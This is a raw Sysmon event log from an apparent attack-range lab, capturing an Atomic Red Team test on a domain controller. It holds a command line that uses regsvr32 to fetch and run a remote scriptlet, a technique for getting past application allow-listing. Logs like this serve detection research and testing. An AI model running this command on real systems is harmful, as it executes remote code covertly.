C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{FF16AF91-36E1-6013-7103-00000000A401}1924C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" 10341000x800000000000000032786Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36E1-6013-7103-00000000A401}1924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032785Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-7103-00000000A401}1924C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFE178CA5C3) 10341000x800000000000000032784Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032783Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032782Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032781Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032780Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7103-00000000A401}1924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032779Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-7103-00000000A401}1924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5035ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e585de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4fc1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e531474(wow64) 154100x800000000000000032778Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-36E1-6013-7103-00000000A401}1924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000032777Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.522{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-err.txt2021-01-28 22:12:49.366 11241100x800000000000000032776Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.522{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-out.txt2021-01-28 22:12:49.366 10341000x800000000000000032775Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.491{FF16AF91-36E1-6013-7003-00000000A401}30246148C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032774Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B5-6013-0A00-00000000A401}8524880C:\Windows\system32\services.exe{FF16AF91-36E1-6013-7003-00000000A401}3024C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032773Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7003-00000000A401}3024C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032772Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7003-00000000A401}3024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032771Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B5-6013-0A00-00000000A401}8524440C:\Windows\system32\services.exe{FF16AF91-36E1-6013-7003-00000000A401}3024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032770Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-26B5-6013-0A00-00000000A401}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032769Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26B5-6013-0B00-00000000A401}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032768Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26B5-6013-0B00-00000000A401}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032767Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.475{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-26B5-6013-0A00-00000000A401}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032766Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032765Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032764Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032763Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26BA-6013-2300-00000000A401}28122828C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032762Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032761Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 